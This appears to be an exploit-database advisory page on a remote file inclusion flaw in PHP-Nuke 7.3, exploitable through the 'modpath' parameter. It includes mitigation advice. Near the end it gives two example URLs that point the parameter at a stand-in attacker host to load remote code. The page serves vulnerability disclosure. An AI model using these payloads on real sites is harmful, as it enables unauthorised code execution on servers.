header-logo
Suggest Exploit
vendor:
PHP-Nuke
by:
7.5
CVSS
HIGH
File Include
CWE
Product Name: PHP-Nuke
Affected Version From: PHP-Nuke version 7.3
Affected Version To:
Patch Exists: NO
Related CWE:
CPE: a:php-nuke:php-nuke:7.3
Metasploit:
Other Scripts:
Platforms Tested:

PHP-Nuke File Include Vulnerability

The PHP-Nuke application is prone to a potential file include vulnerability. This vulnerability allows a remote attacker to include malicious files that contain arbitrary code, which can be executed on a vulnerable system. The vulnerability is exploited by manipulating the 'modpath' parameter in the application's URL.

Mitigation:

It is recommended to update to a patched version of PHP-Nuke to mitigate this vulnerability. Additionally, input validation and sanitization should be implemented to prevent arbitrary file inclusion.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/10365/info

PHP-Nuke is prone to a potential file include vulnerability. This issue could allow a remote attacker to include malicious files containing aribtrary code to be executed on a vulnerable system. This issue can be exploited via the 'modpath' parameter.

If successful, the malicious script supplied by the attacker will be executed in the context of the web server hosting the vulnerable software.

http://www.example.com/nuke73/index.php?modpath=ftp://attacker.com/directory/
http://www.example.com/nuke73/index.php?modpath=//attacker_ip/share_name/

Navigation

Suggest Exploit

Services By CQR